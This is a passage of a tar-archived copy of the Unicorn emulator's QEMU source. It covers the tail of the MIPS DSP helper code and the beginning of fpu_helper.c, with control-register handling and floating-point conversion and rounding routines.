env->active_tc.HI[ac]; tempA = env->active_tc.LO[ac]; if (shift_t != 0) { if (shift_t >= 0) { tempA = (tempB << (64 - shift_t)) | (tempA >> shift_t); tempB = tempB >> shift_t; } else { shift_t = -shift_t; tempB = (tempB << shift_t) | (tempA >> (64 - shift_t)); tempA = tempA << shift_t; } } env->active_tc.HI[ac] = tempB; env->active_tc.LO[ac] = tempA; } #endif void helper_mthlip(target_ulong ac, target_ulong rs, CPUMIPSState *env) { int32_t tempA, tempB, pos; tempA = rs; tempB = env->active_tc.LO[ac]; env->active_tc.HI[ac] = (target_long)tempB; env->active_tc.LO[ac] = (target_long)tempA; pos = get_DSPControl_pos(env); if (pos > 32) { return; } else { set_DSPControl_pos(pos + 32, env); } } #if defined(TARGET_MIPS64) void helper_dmthlip(target_ulong rs, target_ulong ac, CPUMIPSState *env) { uint8_t ac_t; uint8_t pos; uint64_t tempB, tempA; ac_t = ac & 0x3; tempA = rs; tempB = env->active_tc.LO[ac_t]; env->active_tc.HI[ac_t] = tempB; env->active_tc.LO[ac_t] = tempA; pos = get_DSPControl_pos(env); if (pos <= 64) { pos = pos + 64; set_DSPControl_pos(pos, env); } } #endif void cpu_wrdsp(uint32_t rs, uint32_t mask_num, CPUMIPSState *env) { uint8_t mask[6]; uint8_t i; uint32_t newbits, overwrite; target_ulong dsp; newbits = 0x00; overwrite = 0xFFFFFFFF; dsp = env->active_tc.DSPControl; for (i = 0; i < 6; i++) { mask[i] = (mask_num >> i) & 0x01; } if (mask[0] == 1) { #if defined(TARGET_MIPS64) overwrite &= 0xFFFFFF80; newbits &= 0xFFFFFF80; newbits |= 0x0000007F & rs; #else overwrite &= 0xFFFFFFC0; newbits &= 0xFFFFFFC0; newbits |= 0x0000003F & rs; #endif } if (mask[1] == 1) { overwrite &= 0xFFFFE07F; newbits &= 0xFFFFE07F; newbits |= 0x00001F80 & rs; } if (mask[2] == 1) { overwrite &= 0xFFFFDFFF; newbits &= 0xFFFFDFFF; newbits |= 0x00002000 & rs; } if (mask[3] == 1) { overwrite &= 0xFF00FFFF; newbits &= 0xFF00FFFF; newbits |= 0x00FF0000 & rs; } if (mask[4] == 1) { overwrite &= 0x00FFFFFF; newbits &= 0x00FFFFFF; #if defined(TARGET_MIPS64) newbits |= 0xFF000000 & rs; #else newbits |= 0x0F000000 & rs; #endif } if (mask[5] == 1) { overwrite &= 0xFFFFBFFF; newbits &= 0xFFFFBFFF; newbits |= 0x00004000 & rs; } dsp = dsp & overwrite; dsp = dsp | newbits; env->active_tc.DSPControl = dsp; } void helper_wrdsp(target_ulong rs, target_ulong mask_num, CPUMIPSState *env) { cpu_wrdsp(rs, mask_num, env); } uint32_t cpu_rddsp(uint32_t mask_num, CPUMIPSState *env) { uint8_t mask[6]; uint32_t ruler, i; target_ulong temp; target_ulong dsp; ruler = 0x01; for (i = 0; i < 6; i++) { mask[i] = (mask_num & ruler) >> i ; ruler = ruler << 1; } temp = 0x00; dsp = env->active_tc.DSPControl; if (mask[0] == 1) { #if defined(TARGET_MIPS64) temp |= dsp & 0x7F; #else temp |= dsp & 0x3F; #endif } if (mask[1] == 1) { temp |= dsp & 0x1F80; } if (mask[2] == 1) { temp |= dsp & 0x2000; } if (mask[3] == 1) { temp |= dsp & 0x00FF0000; } if (mask[4] == 1) { #if defined(TARGET_MIPS64) temp |= dsp & 0xFF000000; #else temp |= dsp & 0x0F000000; #endif } if (mask[5] == 1) { temp |= dsp & 0x4000; } return temp; } target_ulong helper_rddsp(target_ulong mask_num, CPUMIPSState *env) { return cpu_rddsp(mask_num, env); } #undef MIPSDSP_LHI #undef MIPSDSP_LLO #undef MIPSDSP_HI #undef MIPSDSP_LO #undef MIPSDSP_Q3 #undef MIPSDSP_Q2 #undef MIPSDSP_Q1 #undef MIPSDSP_Q0 #undef MIPSDSP_SPLIT32_8 #undef MIPSDSP_SPLIT32_16 #undef MIPSDSP_RETURN32_8 #undef MIPSDSP_RETURN32_16 #ifdef TARGET_MIPS64 #undef MIPSDSP_SPLIT64_16 #undef MIPSDSP_SPLIT64_32 #undef MIPSDSP_RETURN64_16 #undef MIPSDSP_RETURN64_32 #endif ������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������unicorn-2.1.1/qemu/target/mips/fpu_helper.c���������������������������������������������������������0000664�0000000�0000000�00000223166�14675241067�0020720�0����������������������������������������������������������������������������������������������������ustar�00root����������������������������root����������������������������0000000�0000000������������������������������������������������������������������������������������������������������������������������������������������������������������������������/* * Helpers for emulation of FPU-related MIPS instructions. * * Copyright (C) 2004-2005 Jocelyn Mayer * Copyright (C) 2020 Wave Computing, Inc. * Copyright (C) 2020 Aleksandar Markovic <amarkovic@wavecomp.com> * * This library is free software; you can redistribute it and/or * modify it under the terms of the GNU Lesser General Public * License as published by the Free Software Foundation; either * version 2 of the License, or (at your option) any later version. * * This library is distributed in the hope that it will be useful, * but WITHOUT ANY WARRANTY; without even the implied warranty of * MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU * Lesser General Public License for more details. * * You should have received a copy of the GNU Lesser General Public * License along with this library; if not, see <http://www.gnu.org/licenses/>. * */ #include "qemu/osdep.h" #include "cpu.h" #include "internal.h" #include "qemu/host-utils.h" #include "exec/helper-proto.h" #include "exec/exec-all.h" #include "exec/cpu_ldst.h" #include "exec/memop.h" //#include "sysemu/kvm.h" #include "fpu/softfloat.h" /* Complex FPU operations which may need stack space. */ #define FLOAT_TWO32 make_float32(1 << 30) #define FLOAT_TWO64 make_float64(1ULL << 62) #define FP_TO_INT32_OVERFLOW 0x7fffffff #define FP_TO_INT64_OVERFLOW 0x7fffffffffffffffULL /* convert MIPS rounding mode in FCR31 to IEEE library */ unsigned int ieee_rm[] = { float_round_nearest_even, float_round_to_zero, float_round_up, float_round_down }; target_ulong helper_cfc1(CPUMIPSState *env, uint32_t reg) { target_ulong arg1 = 0; switch (reg) { case 0: arg1 = (int32_t)env->active_fpu.fcr0; break; case 1: /* UFR Support - Read Status FR */ if (env->active_fpu.fcr0 & (1 << FCR0_UFRP)) { if (env->CP0_Config5 & (1 << CP0C5_UFR)) { arg1 = (int32_t) ((env->CP0_Status & (1 << CP0St_FR)) >> CP0St_FR); } else { do_raise_exception(env, EXCP_RI, GETPC()); } } break; case 5: /* FRE Support - read Config5.FRE bit */ if (env->active_fpu.fcr0 & (1 << FCR0_FREP)) { if (env->CP0_Config5 & (1 << CP0C5_UFE)) { arg1 = (env->CP0_Config5 >> CP0C5_FRE) & 1; } else { helper_raise_exception(env, EXCP_RI); } } break; case 25: arg1 = ((env->active_fpu.fcr31 >> 24) & 0xfe) | ((env->active_fpu.fcr31 >> 23) & 0x1); break; case 26: arg1 = env->active_fpu.fcr31 & 0x0003f07c; break; case 28: arg1 = (env->active_fpu.fcr31 & 0x00000f83) | ((env->active_fpu.fcr31 >> 22) & 0x4); break; default: arg1 = (int32_t)env->active_fpu.fcr31; break; } return arg1; } void helper_ctc1(CPUMIPSState *env, target_ulong arg1, uint32_t fs, uint32_t rt) { switch (fs) { case 1: /* UFR Alias - Reset Status FR */ if (!((env->active_fpu.fcr0 & (1 << FCR0_UFRP)) && (rt == 0))) { return; } if (env->CP0_Config5 & (1 << CP0C5_UFR)) { env->CP0_Status &= ~(1 << CP0St_FR); compute_hflags(env); } else { do_raise_exception(env, EXCP_RI, GETPC()); } break; case 4: /* UNFR Alias - Set Status FR */ if (!((env->active_fpu.fcr0 & (1 << FCR0_UFRP)) && (rt == 0))) { return; } if (env->CP0_Config5 & (1 << CP0C5_UFR)) { env->CP0_Status |= (1 << CP0St_FR); compute_hflags(env); } else { do_raise_exception(env, EXCP_RI, GETPC()); } break; case 5: /* FRE Support - clear Config5.FRE bit */ if (!((env->active_fpu.fcr0 & (1 << FCR0_FREP)) && (rt == 0))) { return; } if (env->CP0_Config5 & (1 << CP0C5_UFE)) { env->CP0_Config5 &= ~(1 << CP0C5_FRE); compute_hflags(env); } else { helper_raise_exception(env, EXCP_RI); } break; case 6: /* FRE Support - set Config5.FRE bit */ if (!((env->active_fpu.fcr0 & (1 << FCR0_FREP)) && (rt == 0))) { return; } if (env->CP0_Config5 & (1 << CP0C5_UFE)) { env->CP0_Config5 |= (1 << CP0C5_FRE); compute_hflags(env); } else { helper_raise_exception(env, EXCP_RI); } break; case 25: if ((env->insn_flags & ISA_MIPS32R6) || (arg1 & 0xffffff00)) { return; } env->active_fpu.fcr31 = (env->active_fpu.fcr31 & 0x017fffff) | ((arg1 & 0xfe) << 24) | ((arg1 & 0x1) << 23); break; case 26: if (arg1 & 0x007c0000) { return; } env->active_fpu.fcr31 = (env->active_fpu.fcr31 & 0xfffc0f83) | (arg1 & 0x0003f07c); break; case 28: if (arg1 & 0x007c0000) { return; } env->active_fpu.fcr31 = (env->active_fpu.fcr31 & 0xfefff07c) | (arg1 & 0x00000f83) | ((arg1 & 0x4) << 22); break; case 31: env->active_fpu.fcr31 = (arg1 & env->active_fpu.fcr31_rw_bitmask) | (env->active_fpu.fcr31 & ~(env->active_fpu.fcr31_rw_bitmask)); break; default: if (env->insn_flags & ISA_MIPS32R6) { do_raise_exception(env, EXCP_RI, GETPC()); } return; } restore_fp_status(env); set_float_exception_flags(0, &env->active_fpu.fp_status); if ((GET_FP_ENABLE(env->active_fpu.fcr31) | 0x20) & GET_FP_CAUSE(env->active_fpu.fcr31)) { do_raise_exception(env, EXCP_FPE, GETPC()); } } int ieee_ex_to_mips(int xcpt) { int ret = 0; if (xcpt) { if (xcpt & float_flag_invalid) { ret |= FP_INVALID; } if (xcpt & float_flag_overflow) { ret |= FP_OVERFLOW; } if (xcpt & float_flag_underflow) { ret |= FP_UNDERFLOW; } if (xcpt & float_flag_divbyzero) { ret |= FP_DIV0; } if (xcpt & float_flag_inexact) { ret |= FP_INEXACT; } } return ret; } static inline void update_fcr31(CPUMIPSState *env, uintptr_t pc) { int tmp = ieee_ex_to_mips(get_float_exception_flags( &env->active_fpu.fp_status)); SET_FP_CAUSE(env->active_fpu.fcr31, tmp); if (tmp) { set_float_exception_flags(0, &env->active_fpu.fp_status); if (GET_FP_ENABLE(env->active_fpu.fcr31) & tmp) { do_raise_exception(env, EXCP_FPE, pc); } else { UPDATE_FP_FLAGS(env->active_fpu.fcr31, tmp); } } } /* * Float support. * Single precition routines have a "s" suffix, double precision a * "d" suffix, 32bit integer "w", 64bit integer "l", paired single "ps", * paired single lower "pl", paired single upper "pu". */ /* unary operations, modifying fp status */ uint64_t helper_float_sqrt_d(CPUMIPSState *env, uint64_t fdt0) { fdt0 = float64_sqrt(fdt0, &env->active_fpu.fp_status); update_fcr31(env, GETPC()); return fdt0; } uint32_t helper_float_sqrt_s(CPUMIPSState *env, uint32_t fst0) { fst0 = float32_sqrt(fst0, &env->active_fpu.fp_status); update_fcr31(env, GETPC()); return fst0; } uint64_t helper_float_cvtd_s(CPUMIPSState *env, uint32_t fst0) { uint64_t fdt2; fdt2 = float32_to_float64(fst0, &env->active_fpu.fp_status); update_fcr31(env, GETPC()); return fdt2; } uint64_t helper_float_cvtd_w(CPUMIPSState *env, uint32_t wt0) { uint64_t fdt2; fdt2 = int32_to_float64(wt0, &env->active_fpu.fp_status); update_fcr31(env, GETPC()); return fdt2; } uint64_t helper_float_cvtd_l(CPUMIPSState *env, uint64_t dt0) { uint64_t fdt2; fdt2 = int64_to_float64(dt0, &env->active_fpu.fp_status); update_fcr31(env, GETPC()); return fdt2; } uint64_t helper_float_cvt_l_d(CPUMIPSState *env, uint64_t fdt0) { uint64_t dt2; dt2 = float64_to_int64(fdt0, &env->active_fpu.fp_status); if (get_float_exception_flags(&env->active_fpu.fp_status) & (float_flag_invalid | float_flag_overflow)) { dt2 = FP_TO_INT64_OVERFLOW; } update_fcr31(env, GETPC()); return dt2; } uint64_t helper_float_cvt_l_s(CPUMIPSState *env, uint32_t fst0) { uint64_t dt2; dt2 = float32_to_int64(fst0, &env->active_fpu.fp_status); if (get_float_exception_flags(&env->active_fpu.fp_status) & (float_flag_invalid | float_flag_overflow)) { dt2 = FP_TO_INT64_OVERFLOW; } update_fcr31(env, GETPC()); return dt2; } uint64_t helper_float_cvtps_pw(CPUMIPSState *env, uint64_t dt0) { uint32_t fst2; uint32_t fsth2; fst2 = int32_to_float32(dt0 & 0XFFFFFFFF, &env->active_fpu.fp_status); fsth2 = int32_to_float32(dt0 >> 32, &env->active_fpu.fp_status); update_fcr31(env, GETPC()); return ((uint64_t)fsth2 << 32) | fst2; } uint64_t helper_float_cvtpw_ps(CPUMIPSState *env, uint64_t fdt0) { uint32_t wt2; uint32_t wth2; int excp, excph; wt2 = float32_to_int32(fdt0 & 0XFFFFFFFF, &env->active_fpu.fp_status); excp = get_float_exception_flags(&env->active_fpu.fp_status); if (excp & (float_flag_overflow | float_flag_invalid)) { wt2 = FP_TO_INT32_OVERFLOW; } set_float_exception_flags(0, &env->active_fpu.fp_status); wth2 = float32_to_int32(fdt0 >> 32, &env->active_fpu.fp_status); excph = get_float_exception_flags(&env->active_fpu.fp_status); if (excph & (float_flag_overflow | float_flag_invalid)) { wth2 = FP_TO_INT32_OVERFLOW; } set_float_exception_flags(excp | excph, &env->active_fpu.fp_status); update_fcr31(env, GETPC()); return ((uint64_t)wth2 << 32) | wt2; } uint32_t helper_float_cvts_d(CPUMIPSState *env, uint64_t fdt0) { uint32_t fst2; fst2 = float64_to_float32(fdt0, &env->active_fpu.fp_status); update_fcr31(env, GETPC()); return fst2; } uint32_t helper_float_cvts_w(CPUMIPSState *env, uint32_t wt0) { uint32_t fst2; fst2 = int32_to_float32(wt0, &env->active_fpu.fp_status); update_fcr31(env, GETPC()); return fst2; } uint32_t helper_float_cvts_l(CPUMIPSState *env, uint64_t dt0) { uint32_t fst2; fst2 = int64_to_float32(dt0, &env->active_fpu.fp_status); update_fcr31(env, GETPC()); return fst2; } uint32_t helper_float_cvts_pl(CPUMIPSState *env, uint32_t wt0) { uint32_t wt2; wt2 = wt0; update_fcr31(env, GETPC()); return wt2; } uint32_t helper_float_cvts_pu(CPUMIPSState *env, uint32_t wth0) { uint32_t wt2; wt2 = wth0; update_fcr31(env, GETPC()); return wt2; } uint32_t helper_float_cvt_w_s(CPUMIPSState *env, uint32_t fst0) { uint32_t wt2; wt2 = float32_to_int32(fst0, &env->active_fpu.fp_status); if (get_float_exception_flags(&env->active_fpu.fp_status) & (float_flag_invalid | float_flag_overflow)) { wt2 = FP_TO_INT32_OVERFLOW; } update_fcr31(env, GETPC()); return wt2; } uint32_t helper_float_cvt_w_d(CPUMIPSState *env, uint64_t fdt0) { uint32_t wt2; wt2 = float64_to_int32(fdt0, &env->active_fpu.fp_status); if (get_float_exception_flags(&env->active_fpu.fp_status) & (float_flag_invalid | float_flag_overflow)) { wt2 = FP_TO_INT32_OVERFLOW; } update_fcr31(env, GETPC()); return wt2; } uint64_t helper_float_round_l_d(CPUMIPSState *env, uint64_t fdt0) { uint64_t dt2; set_float_rounding_mode(float_round_nearest_even, &env->active_fpu.fp_status); dt2 = float64_to_int64(fdt0, &env->active_fpu.fp_status); restore_rounding_mode(env); if (get_float_exception_flags(&env->active_fpu.fp_status) & (float_flag_invalid | float_flag_overflow)) { dt2 = FP_TO_INT64_OVERFLOW; } update_fcr31(env, GETPC()); return dt2; } uint64_t helper_float_round_l_s(CPUMIPSState *env, uint32_t fst0) { uint64_t dt2; set_float_rounding_mode(float_round_nearest_even, &env->active_fpu.fp_status); dt2 = float32_to_int64(fst0, &env->active_fpu.fp_status); restore_rounding_mode(env); if (get_float_exception_flags(&env->active_fpu.fp_status) & (float_flag_invalid | float_flag_overflow)) { dt2 = FP_TO_INT64_OVERFLOW; } update_fcr31(env, GETPC()); return dt2; } uint32_t helper_float_round_w_d(CPUMIPSState *env, uint64_t fdt0) { uint32_t wt2; set_float_rounding_mode(float_round_nearest_even, &env->active_fpu.fp_status); wt2 = float64_to_int32(fdt0, &env->active_fpu.fp_status); restore_rounding_mode(env); if (get_float_exception_flags(&env->active_fpu.fp_status) & (float_flag_invalid | float_flag_overflow)) { wt2 = FP_TO_INT32_OVERFLOW; } update_fcr31(env, GETPC()); return wt2; } uint32_t helper_float_round_w_s(CPUMIPSState *env, uint32_t fst0) { uint32_t wt2; set_float_rounding_mode(float_round_nearest_even, &env->active_fpu.fp_status); wt2 = float32_to_int32(fst0, &env->active_fpu.fp_status); restore_rounding_mode(env); if (get_float_exception_flags(&env->active_fpu.fp_status) & (float_flag_invalid | float_flag_overflow)) { wt2 = FP_TO_INT32_OVERFLOW; } update_fcr31(env, GETPC()); return wt2; } uint64_t helper_float_trunc_l_d(CPUMIPSState *env, uint64_t fdt0) { uint64_t dt2; dt2 = float64_to_int64_round_to_zero(fdt0, &env->active_fpu.fp_status); if (get_float_exception_flags(&env->active_fpu.fp_status) & (float_flag_invalid | float_flag_overflow)) { dt2 = FP_TO_INT64_OVERFLOW; } update_fcr31(env, GETPC()); return dt2; } uint64_t helper_float_trunc_l_s(CPUMIPSState *env, uint32_t fst0) { uint64_t dt2; dt2 = float32_to_int64_round_to_zero(fst0, &env->active_fpu.fp_status); if (get_float_exception_flags(&env->active_fpu.fp_status) & (float_flag_invalid | float_flag_overflow)) { dt2 = FP_TO_INT64_OVERFLOW; } update_fcr31(env, GETPC()); return dt2; } uint32_t helper_float_trunc_w_d(CPUMIPSState *env, uint64_t fdt0) { uint32_t wt2; wt2 = float64_to_int32_round_to_zero(fdt0, &env->active_fpu.fp_status); if (get_float_exception_flags(&env->active_fpu.fp_status) & (float_flag_invalid | float_flag_overflow)) { wt2 = FP_TO_INT32_OVERFLOW; } update_fcr31(env, GETPC()); return wt2; } uint32_t helper_float_trunc_w_s(CPUMIPSState *env, uint32_t fst0) { uint32_t wt2; wt2 = float32_to_int32_round_to_zero(fst0, &env->active_fpu.fp_status); if (get_float_exception_flags(&env->active_fpu.fp_status) & (float_flag_invalid | float_flag_overflow)) { wt2 = FP_TO_INT32_OVERFLOW; } update_fcr31(env, GETPC()); return wt2; } uint64_t helper_float_ceil_l_d(CPUMIPSState *env, uint64_t fdt0) { uint64_t dt2; set_float_rounding_mode(float_round_up, &env->active_fpu.fp_status); dt2 = float64_to_int64(fdt0, &env->active_fpu.fp_status); restore_rounding_mode(env); if (get_float_exception_flags(&env->active_fpu.fp_status) & (float_flag_invalid | float_flag_overflow)) { dt2 = FP_TO_INT64_OVERFLOW; } update_fcr31(env, GETPC()); return dt2; } uint64_t helper_float_ceil_l_s(CPUMIPSState *env, uint32_t fst0) { uint64_t dt2; set_float_rounding_mode(float_round_up, &env->active_fpu.fp_status); dt2 = float32_to_int64(fst0, &env->active_fpu.fp_status); restore_rounding_mode(env); if (get_float_exception_flags(&env->active_fpu.fp_status) & (float_flag_invalid | float_flag_overflow)) { dt2 = FP_TO_INT64_OVERFLOW; } update_fcr31(env, GETPC()); return dt2; } uint32_t helper_float_ceil_w_d(CPUMIPSState *env, uint64_t fdt0) { uint32_t wt2; set_float_rounding_mode(float_round_up, &env->active_fpu.fp_status); wt2 = float64_to_int32(fdt0, &env->active_fpu.fp_status); restore_rounding_mode(env); if (get_float_exception_flags(&env->active_fpu.fp_status) & (float_flag_invalid | float_flag_overflow)) { wt2 = FP_TO_INT32_OVERFLOW; } update_fcr31(env, GETPC()); return wt2; } uint32_t helper_float_ceil_w_s(CPUMIPSState *env, uint32_t fst0) { uint32_t wt2; set_float_rounding_mode(float_round_up, &env->active_fpu.fp_status); wt2 = float32_to_int32(fst0, &env->active_fpu.fp_status); restore_rounding_mode(env); if (get_float_exception_flags(&env->active_fpu.fp_status) & (float_flag_invalid | float_flag_overflow)) { wt2 = FP_TO_INT32_OVERFLOW; } update_fcr31(env, GETPC()); return wt2; } uint64_t helper_float_floor_l_d(CPUMIPSState *env, uint64_t fdt0) { uint64_t dt2; set_float_rounding_mode(float_round_down, &env->active_fpu.fp_status); dt2 = float64_to_int64(fdt0, &env->active_fpu.fp_status); restore_rounding_mode(env); if (get_float_exception_flags(&env->active_fpu.fp_status) & (float_flag_invalid | float_flag_overflow)) { dt2 = FP_TO_INT64_OVERFLOW; } update_fcr31(env, GETPC()); return dt2; } uint64_t helper_float_floor_l_s(CPUMIPSState *env, uint32_t fst0) { uint64_t dt2; set_float_rounding_mode(float_round_down, &env->active_fpu.fp_status); dt2 = float32_to_int64(fst0, &env->active_fpu.fp_status); restore_rounding_mode(env); if (get_float_exception_flags(&env->active_fpu.fp_status) & (float_flag_invalid | float_flag_overflow)) { dt2 = FP_TO_INT64_OVERFLOW; } update_fcr31(env, GETPC()); return dt2; } uint32_t helper_float_floor_w_d(CPUMIPSState *env, uint64_t fdt0) { uint32_t wt2; set_float_rounding_mode(float_round_down, &env->active_fpu.fp_status); wt2 = float64_to_int32(fdt0, &env->active_fpu.fp_status); restore_rounding_mode(env); if (get_float_exception_flags(&env->active_fpu.fp_status) & (float_flag_invalid | float_flag_overflow)) { wt2 = FP_TO_INT32_OVERFLOW; } update_fcr31(env, GETPC()); return wt2; } uint32_t helper_float_floor_w_s(CPUMIPSState *env, uint32_t fst0) { uint32_t wt2; set_float_rounding_mode(float_round_down, &env->active_fpu.fp_status); wt2 = float32_to_int32(fst0, &env->active_fpu.fp_status); restore_rounding_mode(env); if (get_float_exception_flags(&env->active_fpu.fp_status) & (float_flag_invalid | float_flag_overflow)) { wt2 = FP_TO_INT32_OVERFLOW; } update_fcr31(env, GETPC()); return wt2; } uint64_t helper_float_cvt_2008_l_d(CPUMIPSState *env, uint64_t fdt0) { uint64_t dt2; dt2 = float64_to_int64(fdt0, &env->active_fpu.fp_status); if (get_float_exception_flags(&env->active_fpu.fp_status) & float_flag_invalid) { if (float64_is_any_nan(fdt0)) { dt2 = 0; } } update_fcr31(env, GETPC()); return dt2; } uint64_t helper_float_cvt_2008_l_s(CPUMIPSState *env, uint32_t fst0) { uint64_t dt2; dt2 = float32_to_int64(fst0, &env->active_fpu.fp_status); if (get_float_exception_flags(&env->active_fpu.fp_status) & float_flag_invalid) { if (float32_is_any_nan(fst0)) { dt2 = 0; } } update_fcr31(env, GETPC()); return dt2; } uint32_t helper_float_cvt_2008_w_d(CPUMIPSState *env, uint64_t fdt0) { uint32_t wt2; wt2 = float64_to_int32(fdt0, &env->active_fpu.fp_status); if (get_float_exception_flags(&env->active_fpu.fp_status) & float_flag_invalid) { if (float64_is_any_nan(fdt0)) { wt2 = 0; } } update_fcr31(env, GETPC()); return wt2; } uint32_t helper_float_cvt_2008_w_s(CPUMIPSState *env, uint32_t fst0) { uint32_t wt2; wt2 = float32_to_int32(fst0, &env->active_fpu.fp_status); if (get_float_exception_flags(&env->active_fpu.fp_status) & float_flag_invalid) { if (float32_is_any_nan(fst0)) { wt2 = 0; } } update_fcr31(env, GETPC()); return wt2; } uint64_t helper_float_round_2008_l_d(CPUMIPSState *env, uint64_t fdt0) { uint64_t dt2; set_float_rounding_mode(float_round_nearest_even, &env->active_fpu.fp_status); dt2 = float64_to_int64(fdt0, &env->active_fpu.fp_status); restore_rounding_mode(env); if (get_float_exception_flags(&env->active_fpu.fp_status) & float_flag_invalid) { if (float64_is_any_nan(fdt0)) { dt2 = 0; } } update_fcr31(env, GETPC()); return dt2; } uint64_t helper_float_round_2008_l_s(CPUMIPSState *env, uint32_t fst0) { uint64_t dt2; set_float_rounding_mode(float_round_nearest_even, &env->active_fpu.fp_status); dt2 = float32_to_int64(fst0, &env->active_fpu.fp_status); restore_rounding_mode(env); if (get_float_exception_flags(&env->active_fpu.fp_status) & float_flag_invalid) { if (float32_is_any_nan(fst0)) { dt2 = 0; } } update_fcr31(env, GETPC()); return dt2; } uint32_t helper_float_round_2008_w_d(CPUMIPSState *env, uint64_t fdt0) { uint32_t wt2; set_float_rounding_mode(float_round_nearest_even, &env->active_fpu.fp_status); wt2 = float64_to_int32(fdt0, &env->active_fpu.fp_status); restore_rounding_mode(env); if (get_float_exception_flags(&env->active_fpu.fp_status) & float_flag_invalid) { if (float64_is_any_nan(fdt0)) { wt2 = 0; } } update_fcr31(env, GETPC()); return wt2; } uint32_t helper_float_round_2008_w_s(CPUMIPSState *env, uint32_t fst0) { uint32_t wt2; set_float_rounding_mode(float_round_nearest_even, &env->active_fpu.fp_status); wt2 = float32_to_int32(fst0, &env->active_fpu.fp_status); restore_rounding_mode(env); if (get_float_exception_flags(&env->active_fpu.fp_status) & float_flag_invalid) { if (float32_is_any_nan(fst0)) { wt2 = 0; } } update_fcr31(env, GETPC()); return wt2; } uint64_t helper_float_trunc_2008_l_d(CPUMIPSState *env, uint64_t fdt0) { uint64_t dt2; dt2 = float64_to_int64_round_to_zero(fdt0, &env->active_fpu.fp_status); if (get_float_exception_flags(&env->active_fpu.fp_status) & float_flag_invalid) { if (float64_is_any_nan(fdt0)) { dt2 = 0; } } update_fcr31(env, GETPC()); return dt2; } uint64_t helper_float_trunc_2008_l_s(CPUMIPSState *env, uint32_t fst0) { uint64_t dt2; dt2 = float32_to_int64_round_to_zero(fst0, &env->active_fpu.fp_status); if (get_float_exception_flags(&env->active_fpu.fp_status) & float_flag_invalid) { if (float32_is_any_nan(fst0)) { dt2 = 0; } } update_fcr31(env, GETPC()); return dt2; } uint32_t helper_float_trunc_2008_w_d(CPUMIPSState *env, uint64_t fdt0) { uint32_t wt2; wt2 = float64_to_int32_round_to_zero(fdt0, &env->active_fpu.fp_status); if (get_float_exception_flags(&env->active_fpu.fp_status) & float_flag_invalid) { if (float64_is_any_nan(fdt0)) { wt2 = 0; } } update_fcr31(env, GETPC()); return wt2; } uint32_t helper_float_trunc_2008_w_s(CPUMIPSState *env, uint32_t fst0) { uint32_t wt2; wt2 = float32_to_int32_round_to_zero(fst0, &env->active_fpu.fp_status); if (get_float_exception_flags(&env->active_fpu.fp_status) & float_flag_invalid) { if (float32_is_any_nan(fst0)) { wt2 = 0; } } update_fcr31(env, GETPC()); return wt2; } uint64_t helper_float_ceil_2008_l_d(CPUMIPSState *env, uint64_t fdt0) { uint64_t dt2; set_float_rounding_mode(float_round_up, &env->active_fpu.fp_status); dt2 = float64_to_int64(fdt0, &env->active_fpu.fp_status); restore_rounding_mode(env); if (get_float_exception_flags(&env->active_fpu.fp_status) & float_flag_invalid) { if (float64_is_any_nan(fdt0)) { dt2 = 0; } } update_fcr31(env, GETPC()); return dt2; } uint64_t helper_float_ceil_2008_l_s(CPUMIPSState *env, uint32_t fst0) { uint64_t dt2; set_float_rounding_mode(float_round_up, &env->active_fpu.fp_status); dt2 = float32_to_int64(fst0, &env->active_fpu.fp_status); restore_rounding_mode(env); if (get_float_exception_flags(&env->active_fpu.fp_status) & float_flag_invalid) { if (float32_is_any_nan(fst0)) { dt2 = 0; } } update_fcr31(env, GETPC()); return dt2; } uint32_t helper_float_ceil_2008_w_d(CPUMIPSState *env, uint64_t fdt0) { uint32_t wt2; set_float_rounding_mode(float_round_up, &env->active_fpu.fp_status); wt2 = float64_to_int32(fdt0, &env->active_fpu.fp_status); restore_rounding_mode(env); if (get_float_exception_flags(&env->active_fpu.fp_status) & float_flag_invalid) { if (float64_is_any_nan(fdt0)) { wt2 = 0; } } update_fcr31(env, GETPC()); return wt2; } uint32_t helper_float_ceil_2008_w_s(CPUMIPSState *env, uint32_t fst0) { uint32_t wt2; set_float_rounding_mode(float_round_up, &env->active_fpu.fp_status); wt2 = float32_to_int32(fst0, &env->active_fpu.fp_status); restore_rounding_mode(env); if (get_float_exception_flags(&env->active_fpu.fp_status) & float_flag_invalid) { if (float32_is_any_nan(fst0)) { wt2 = 0; } } update_fcr31(env, GETPC()); return wt2; } uint64_t helper_float_floor_2008_l_d(CPUMIPSState *env, uint64_t fdt0) { uint64_t dt2; set_float_rounding_mode(float_round_down, &env->active_fpu.fp_status); dt2 = float64_to_int64(fdt0, &env->active_fpu.fp_status); restore_rounding_mode(env); if (get_float_exception_flags(&env->active_fpu.fp_status) & float_flag_invalid) { if (float64_is_any_nan(fdt0)) { dt2 = 0; } } update_fcr31(env, GETPC()); return dt2; } uint64_t helper_float_floor_2008_l_s(CPUMIPSState *env, uint32_t fst0) { uint64_t dt2; set_float_rounding_mode(float_round_down, &env->active_fpu.fp_status); dt2 = float32_to_int64(fst0, &env->active_fpu.fp_status); restore_rounding_mode(env); if (get_float_exception_flags(&env->active_fpu.fp_status) & float_flag_invalid) { if (float32_is_any_nan(fst0)) { dt2 = 0; } } update_fcr31(env, GETPC()); return dt2; } uint32_t helper_float_floor_2008_w_d(CPUMIPSState *env, uint64_t fdt0) { uint32_t wt2; set_float_rounding_mode(float_round_down, &env->active_fpu.fp_status); wt2 = float64_to_int32(fdt0, &env->active_fpu.fp_status); restore_rounding_mode(env); if (get_float_exception_flags(&env->active_fpu.fp_status) & float_flag_invalid) { if (float64_is_any_nan(fdt0)) { wt2 = 0; } } update_fcr31(env, GETPC()); return wt2; } uint32_t helper_float_floor_2008_w_s(CPUMIPSState *env, uint32_t fst0) { uint32_t wt2; set_float_rounding_mode(float_round_down, &env->active_fpu.fp_status); wt2 = float32_to_int32(fst0, &env->active_fpu.fp_status); restore_rounding_mode(env); if (get_float_exception_flags(&env->active_fpu.fp_status) & float_flag_invalid) { if (float32_is_any_nan(fst0)) { wt2 = 0; } } update_fcr31(env, GETPC()); return wt2; } /* unary operations, not modifying fp status */ #define FLOAT_UNOP(name) \ uint64_t helper_float_ ## name ## _d(uint64_t fdt0) \ { \ return float64_ ## name(fdt0); \ } \ uint32_t helper_float_ ## name ## _s(uint32_t fst0) \ { \ return float32_ ## name(fst0); \ } \ uint64_t helper_float_ ## name ## _ps(uint64_t fdt0) \ { \ uint32_t wt0; \ uint32_t wth0; \ \ wt0 = float32_ ## name(fdt0 & 0XFFFFFFFF); \ wth0 = 